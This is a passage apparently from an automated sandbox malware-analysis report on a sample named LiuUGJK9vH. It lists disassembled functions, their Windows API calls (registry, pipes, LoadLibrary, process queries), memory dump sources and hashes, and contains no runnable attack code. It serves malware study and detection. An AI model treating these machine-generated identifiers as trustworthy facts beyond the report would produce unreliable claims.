                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                      • String ID: 0
                      • API String ID: 4152858687-4108050209
                      • Opcode ID: 36020492c05a5bc8181169e2455f976669ac6635689806e7418e508e7bf96093
                      • Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
                      • Opcode Fuzzy Hash: 36020492c05a5bc8181169e2455f976669ac6635689806e7418e508e7bf96093
                      • Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B
                      Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memmove$_free
                      • String ID: 3cA$_A
                      • API String ID: 2620147621-3480954128
                      • Opcode ID: fc79bb831323697d85a5635729b3fd95b30c12d258a38a46f5bd99e813b77d49
                      • Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
                      • Opcode Fuzzy Hash: fc79bb831323697d85a5635729b3fd95b30c12d258a38a46f5bd99e813b77d49
                      • Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A
                      Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _memset$_memmove
                      • String ID: 3cA$ERCP
                      • API String ID: 2532777613-1471582817
                      • Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                      • Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
                      • Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
                      • Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59
                      Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 004627C0
                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Menu$Delete$InfoItem_memset
                      • String ID: 0
                      • API String ID: 1173514356-4108050209
                      • Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                      • Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
                      • Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
                      • Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B
                      Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
                        • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$_memmove$ClassName
                      • String ID: ComboBox$ListBox
                      • API String ID: 365058703-1403004172
                      • Opcode ID: 41b172fb23dd49c8d8f52202ad798600498582b3503cd6c88b0e487f8b7c978c
                      • Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
                      • Opcode Fuzzy Hash: 41b172fb23dd49c8d8f52202ad798600498582b3503cd6c88b0e487f8b7c978c
                      • Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28
                      Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                        • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                        • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
                      • LoadLibraryW.KERNEL32(?), ref: 00486468
                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
                      • DestroyWindow.USER32(?), ref: 00486485
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                      • String ID: SysAnimate32
                      • API String ID: 4146253029-1011021900
                      • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                      • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                      • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                      • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
                      Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
                      • GetStdHandle.KERNEL32(0000000C), ref: 00466E01
                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                      • Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
                      • Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
                      • Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
                      Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                      Download Yara Rule
                      APIs
                      • GetStdHandle.KERNEL32(000000F6), ref: 00466E89
                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
                      • GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CreateHandle$FilePipe
                      • String ID: nul
                      • API String ID: 4209266947-2873401336
                      • Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                      • Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
                      • Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
                      • Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
                      Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046AC54
                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
                      • __swprintf.LIBCMT ref: 0046ACC1
                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$InformationVolume__swprintf
                      • String ID: %lu
                      • API String ID: 3164766367-685833217
                      • Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                      • Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
                      • Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
                      • Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
                      Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON
                      Download Yara Rule
                      APIs
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: CounterPerformanceQuerySleep
                      • String ID: @F
                      • API String ID: 2875609808-2781531706
                      • Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                      • Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
                      • Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
                      • Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
                      Function 02F93FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02F93F73,00000003,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002), ref: 02F93FE2
                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02F93FF5
                      • FreeLibrary.KERNEL32(00000000,?,?,?,02F93F73,00000003,?,02F93F13,00000003,02FADE80,0000000C,02F9403D,00000003,00000002,00000000), ref: 02F94018
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: c6154bcbc82f0fc3746964b70a7332eda4186991a9b75c62f38639b70e2cd8ed
                      • Instruction ID: fe98cb07fa7cc6c1ae45b08084e5814ee8c224de04f3283056cf23814adb215c
                      • Opcode Fuzzy Hash: c6154bcbc82f0fc3746964b70a7332eda4186991a9b75c62f38639b70e2cd8ed
                      • Instruction Fuzzy Hash: 4BF04470E4021CBBEF119F54DC09B9EFFB5EB04795F000054E906A2160DB759A55CF90
                      Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                      Download Yara Rule
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
                      • CloseHandle.KERNEL32(?), ref: 0047EDEB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                      • String ID:
                      • API String ID: 2364364464-0
                      • Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                      • Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
                      • Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
                      • Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
                      Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                        • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
                      • RegCloseKey.ADVAPI32(?,?), ref: 004801AF
                      • RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3440857362-0
                      • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                      • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                      • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                      • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                      Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                      Download Yara Rule
                      APIs
                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                      • String ID:
                      • API String ID: 1389676194-0
                      • Opcode ID: d6c5ad3fb6ca5a7530da9ebf80c1998454db4a05b27433f17472f6f9ec9ce4d2
                      • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                      • Opcode Fuzzy Hash: d6c5ad3fb6ca5a7530da9ebf80c1998454db4a05b27433f17472f6f9ec9ce4d2
                      • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                      Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                      • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                      • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
